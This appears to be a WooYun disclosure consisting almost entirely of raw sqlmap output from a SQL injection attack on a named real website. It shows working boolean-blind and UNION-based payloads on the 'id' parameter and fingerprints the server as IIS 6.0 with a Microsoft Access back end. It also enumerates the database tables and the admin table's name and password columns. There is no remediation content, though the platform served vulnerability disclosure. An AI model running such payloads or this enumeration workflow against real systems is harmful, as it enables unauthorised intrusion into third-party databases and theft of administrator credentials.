WooYun.org

GET parameter 'id' is vulnerable. Do you want to keep testin
g the others (if any)? [y/N]
sqlmap identified the following injection points with a tota
l of 29 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=25 AND 7044=7044
    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: id=-2630 UNION ALL SELECT NULL,NULL,CHR(113)&CH
R(106)&CHR(112)&CHR(112)&CHR(113)&CHR(89)&CHR(89)&CHR(122)&C
HR(70)&CHR(86)&CHR(88)&CHR(120)&CHR(77)&CHR(121)&CHR(117)&CH
R(113)&CHR(122)&CHR(120)&CHR(98)&CHR(113),NULL,NULL,NULL,NUL
L,NULL,NULL,NULL FROM MSysAccessObjects%16
---
[22:14:16] [INFO] testing Microsoft Access
[22:14:16] [INFO] confirming Microsoft Access
[22:14:16] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[22:14:16] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 28 times
[22:14:16] [INFO] fetched data logged to text files under 'C
:\Users\DarkWing\.sqlmap\output\www.zjlib.cn'
[*] shutting down at 22:14:16

Database: Microsoft_Access_masterdb
[3 tables]
+----------+
| admin    |
| download |
| news     |
+----------+

Database: Microsoft_Access_masterdb
Table: admin
[7 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| content  | non-numeric |
| data     | non-numeric |
| id       | numeric     |
| ip       | non-numeric |
| logins   | numeric     |
| name     | non-numeric |
| password | non-numeric |
+----------+-------------+
[22:22:21] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2503 times
[22:22:21] [INFO] fetched data logged to text files under 'C
:\Users\DarkWing\.sqlmap\output\www.zjlib.cn'
[*] shutting down at 22:22:21